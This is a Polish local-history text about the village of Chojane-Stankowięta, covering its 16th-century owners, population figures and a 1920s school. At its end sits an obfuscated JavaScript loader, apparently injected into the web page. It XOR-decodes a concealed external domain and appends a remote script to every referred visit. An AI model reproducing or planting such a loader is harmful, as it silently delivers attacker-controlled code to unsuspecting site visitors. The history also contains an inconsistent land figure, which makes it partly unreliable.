Chojane- Stankowięta

Również ta miejscowość wyodrębniła się w połowie XVI wieku, jest notowana od 1580 roku. Spis podatkowy z tego roku notuje wieś Choyane Sthankowiętha, nazwa pochodzi od imienia Stanisław, Stanek.
W końcu XVI wieku była to wioska podzielona między wielu rycerzy, największym właścicielem był tutaj Jan Chojeński, syn Marcina, posiadający 5 włók ziemi. Reszta ziemian to była uboga szlachta: Szczęsny, syn Andrzeja (10 mórg); Wojciech, syn Szczepana (6 mórg); Andrzej, syn Franciszka (1 włóka) oraz dzierżawca Kasper Kraszowski (1 i ¼ włóki). Była to wtedy jedna z większych wiosek szlacheckich. Tak też było w następnych wiekach, w 1827 roku notowano tutaj 18 domów i 144 mieszkańców.
W końcu XIX wieku istniało tu ponad 20 gospodarstw drobnej szlachty, wszystkie grunty wiejskie liczyły 13 ha, w tym 95 gruntów ornych, 6 ha łąk i 9 ha lasów. Miejscowość początkowo należała do gminy Chojane, następnie włączono ją do gminy Wysokie Mazowieckie. W 1921 roku notowano tutaj 21 domów i 126 mieszkańców.
Początki szkolnictwa w tej wsi sięgają roku 1924, w tymże roku istniała już szkoła licząca 74 dzieci (zapewne przeniesiono ją z Chojan Sierocięta), szkoła istniała do końca lat dwudziestych, następnie została zlikwidowana. Jedynym znanym nauczycielem był Antoni Mioduszewski.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);